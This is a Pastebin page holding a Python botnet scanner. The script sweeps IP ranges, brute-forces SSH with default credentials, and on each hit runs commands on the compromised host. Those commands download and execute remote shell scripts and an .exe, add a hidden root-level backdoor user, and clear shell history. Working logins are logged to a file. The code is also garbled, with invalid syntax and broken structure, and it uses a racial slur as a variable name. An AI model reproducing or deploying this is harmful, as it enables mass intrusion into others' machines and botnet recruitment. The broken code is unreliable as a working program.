Advertisement
oAntiWiFi

Python BotNet TelNet Scanner scanner.py

Dec 8th, 2017
1,432
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.36 KB | None | 0 0
  1. # Voids hacka scanna
  2. # nano /usr/include/bits/typesizes.h -> change 1024 to 99999
  3. # ulimit -n 99999
  4. # python scan.py 1000 <start-range> <end-range> <<USAGE
  5. '''
  6.  
  7.                             _________  ________    _______  ___________.___  ________ ____ _____________    ________________.___________    _______                              
  8.                             \_   ___ \ \_____  \   \      \ \_   _____/|   |/  _____/|    |   \______   \  /  _  \__    ___/|   \_____  \   \      \                              
  9.   ______   ______   ______  /    \  \/  /   |   \  /   |   \ |    __)  |   /   \  ___|    |   /|       _/ /  /_\  \|    |   |   |/   |   \  /   |   \    ______   ______   ______
  10.  /_____/  /_____/  /_____/  \     \____/    |    \/    |    \|     \   |   \    \_\  \    |  / |    |   \/    |    \    |   |   /    |    \/    |    \  /_____/  /_____/  /_____/
  11.                              \______  /\_______  /\____|__  /\___  /   |___|\______  /______/  |____|_  /\____|__  /____|   |___\_______  /\____|__  /                            
  12.                                     \/         \/         \/     \/                \/                 \/         \/                     \/         \/                            
  13.  
  14. '''
  15. import threading, paramiko, random, socket, time, sys
  16. paramiko.util.log_to_file("/dev/null")
  17. blacklisted = ["127.0","10.0","192.168"]
  18. payload = "" #cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://114.142.160.98/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 114.142.160.98 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 114.142.160.98; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 114.142.160.98 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *#
  19. server_ip = "" #114.142.160.98#
  20. passwords = ["root:root"]
  21. if sys.argv[4] == "root":
  22.     passwords = ["root:root","admin:1234","admin:1111","support:support"] #USE ROOT IN PARAMETERS AND ADD PASSWORDS TO CUSTOMIZE#
  23. if sys.argv[4] == "guest":
  24.     passwords = ["guest:guest"]
  25. if sys.argv[4] == "telnet":
  26.     passwords = ["telnet:telnet"]
  27. '''
  28.  
  29.                             _________  ________    _______  ___________.___  ________ ____ _____________    ________________.___________    _______                              
  30.                             \_   ___ \ \_____  \   \      \ \_   _____/|   |/  _____/|    |   \______   \  /  _  \__    ___/|   \_____  \   \      \                              
  31.   ______   ______   ______  /    \  \/  /   |   \  /   |   \ |    __)  |   /   \  ___|    |   /|       _/ /  /_\  \|    |   |   |/   |   \  /   |   \    ______   ______   ______
  32.  /_____/  /_____/  /_____/  \     \____/    |    \/    |    \|     \   |   \    \_\  \    |  / |    |   \/    |    \    |   |   /    |    \/    |    \  /_____/  /_____/  /_____/
  33.                              \______  /\_______  /\____|__  /\___  /   |___|\______  /______/  |____|_  /\____|__  /____|   |___\_______  /\____|__  /                            
  34.                                     \/         \/         \/     \/                \/                 \/         \/                     \/         \/                            
  35.  
  36. '''
  37. if len(sys.argv) < 4:
  38.     sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
  39. print """\n\x1b[0;37m******************************
  40. *      \x1b[0;31mSTARTING - THREADS SPAWNING\x1b[0;37m      *
  41. ******************************\x1b[0m"""
  42. run = ssh.exec_command
  43. run("ulimit -n 99999; ulimit -s 99999; ulimit -u 99999")
  44. def sshscanner(ip):
  45.     global passwords
  46.     try:
  47.         thisipisbad='no'
  48.         for badip in blacklisted:
  49.             if badip in ip:
  50.                 thisipisbad='yes'
  51.         if thisipisbad=='yes':
  52.             sys.exit()
  53.         username='root'
  54.         password="0"
  55.  
  56.  
  57.  
  58.  
  59. '''      ____    ___   ____   ______         __   ___   ____   _____
  60. |    \  /   \ |    \ |      |       /  ] /   \ |    \ |     |
  61. |  o  )|     ||  D  )|      |      /  / |     ||  _  ||   __|
  62. |   _/ |  O  ||    / |_|  |_|     /  /  |  O  ||  |  ||  |_  
  63. |  |   |     ||    \   |  |      /   \_ |     ||  |  ||   _]
  64. |  |   |     ||  .  \  |  |      \     ||     ||  |  ||  |  
  65. |__|    \___/ |__|\_|  |__|       \____| \___/ |__|__||__|  
  66.                                                              
  67.  '''    
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.         #USE 23 FOR TELNET, 22 FOR SSH AND 21 FOR FTP#
  75.         port = 22
  76.         #USE 23 FOR TELNET, 22 FOR SSH AND 21 FOR FTP#
  77.  
  78.  
  79.  
  80.  
  81.  
  82. '''      ____    ___   ____   ______         __   ___   ____   _____
  83. |    \  /   \ |    \ |      |       /  ] /   \ |    \ |     |
  84. |  o  )|     ||  D  )|      |      /  / |     ||  _  ||   __|
  85. |   _/ |  O  ||    / |_|  |_|     /  /  |  O  ||  |  ||  |_  
  86. |  |   |     ||    \   |  |      /   \_ |     ||  |  ||   _]
  87. |  |   |     ||  .  \  |  |      \     ||     ||  |  ||  |  
  88. |__|    \___/ |__|\_|  |__|       \____| \___/ |__|__||__|  
  89.                                                              
  90.  '''    
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  100.         s.settimeout(3)
  101.         s.connect((ip, port))
  102.         data = str(s.recv(1024))
  103.         if "SSH" in data:
  104.             print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
  105.         elif "ssh" in data:
  106.             print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
  107.         else:
  108.             sys.exit()
  109.         s.close()
  110.         ssh = paramiko.SSHClient()
  111.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  112.         dobreak=False
  113. def paramikofunc():
  114.     ssh.exec_command("wget -q http://DirectLink.cz/download/8ec063cc3b.exe -O .l; chmod +x .1; nohup ./.1 </dev/null/ >/dev/null 2>&1");
  115.         for passwd in passwords:
  116.             if ":n/a" in passwd:
  117.                 password=""
  118.             else:
  119.                 password=passwd.split(":")[1]
  120.             if "n/a:" in passwd:
  121.                 username=""
  122.             else:
  123.                 username=passwd.split(":")[0]
  124.             try:
  125.                 ssh.connect(ip, port = port, username=username, password=password, timeout=3)
  126.                 break
  127.             except:
  128.                 pass
  129.         badserver=True
  130.         stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  131.         output = stdout.read()
  132.         if "inet addr" in output:
  133.             badserver=False
  134.             def pass(sys.exit()):
  135.         ssh.exec_command("useradd -o -u 0 -g 0 -M -d /root -s /bin/bash USER; echo -e \"PASS\nPASS\" | passwd USER; curl http://blasze.tk/PMC3F9; wget -q -O /tmp/.... http://blasze.tk/PMC3F9; clear; history -c");
  136.         websites = [ ]         
  137.         if badserver == False:                  
  138.                 print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
  139.                 ssh.exec_command(""+payload+"")
  140.  
  141.                 vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
  142.                 time.sleep(12)
  143.                 custombins = ["https://pastebin.com/raw/p5k6zfQG"
  144.           "http://uclibc.org/bundle/crosscompilersALL.tar.gz"]
  145.  
  146. for custombins in custombins:
  147.     ssh.exec_command('wget -q -O .zz ' + custombins)
  148.     ssh.exec_command('chmod +x .zz; nohup ./.zz </dev/null >/dev/null 2>&1')
  149.  
  150.                 paramikofunc()
  151.                 ssh.close()
  152.                 pass(sys.exit())
  153.     except Exception as e:
  154.         pass
  155. if sys.argv[2] == "LUCKY":
  156.     ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
  157.     randomrange = random.choice(ranges)
  158.     startrng = randomrange.split("/")[0]
  159.     endrng = randomrange.split("/")[1]
  160. if sys.argv[2] != "LUCKY":
  161.     a = int(sys.argv[2].split(".")[0])
  162.     b = int(sys.argv[2].split(".")[1])
  163.     c = int(sys.argv[2].split(".")[2])
  164.     d = int(sys.argv[2].split(".")[3])
  165. else:
  166.     a = int(startrng.split(".")[0])
  167.     b = int(startrng.split(".")[1])
  168.     c = int(startrng.split(".")[2])
  169.     d = int(startrng.split(".")[3])
  170. x = 0    
  171.  
  172. while(True):
  173.     try:
  174.         if sys.argv[2] != "LUCKY":
  175.             endaddr = sys.argv[3]
  176.         else:
  177.             endaddr = endrng
  178.        
  179.         d += 1
  180.         ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
  181.         if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
  182.             if sys.argv[2] == "LUCKY":
  183.                 randomrange = random.choice(ranges)
  184.                 startrng = randomrange.split("/")[0]
  185.                 endrng = randomrange.split("/")[1]
  186.                 a = int(startrng.split(".")[0])
  187.                 b = int(startrng.split(".")[1])
  188.                 c = int(startrng.split(".")[2])
  189.                 d = int(startrng.split(".")[3])
  190.             else:
  191.                 break
  192.         if d > 255:
  193.             c += 1
  194.             d = 0
  195. if 2 + 2 = 4:
  196.     niggaGang = True;
  197. if niggaGang = True :
  198. def pass():
  199.     paramikofunc()
  200.     pass(sys.exit())
  201.     pass;
  202.  
  203.         if c > 255:
  204.             b += 1
  205.             c = 0
  206.        
  207.         if b > 255:
  208.             a += 1
  209.             b = 0
  210.         ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
  211.  
  212.         if ipaddr == endaddr:
  213.             if sys.argv[2] == "LUCKY":
  214.                 randomrange = random.choice(ranges)
  215.                 startrng = randomrange.split("/")[0]
  216.                 endrng = randomrange.split("/")[1]
  217.                 a = int(startrng.split(".")[0])
  218.                 b = int(startrng.split(".")[1])
  219.                 c = int(startrng.split(".")[2])
  220.                 d = int(startrng.split(".")[3])
  221.             else:
  222.                 break
  223.  
  224.         if x > 500:
  225.             time.sleep(1)
  226.             x = 0
  227.        
  228.         t = threading.Thread(target=sshscanner, args=(ipaddr,))
  229.         t.start()
  230.     except Exception as e:
  231.         pass()
  232.  
  233. print "\x1b[37mDone\x1b[37m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement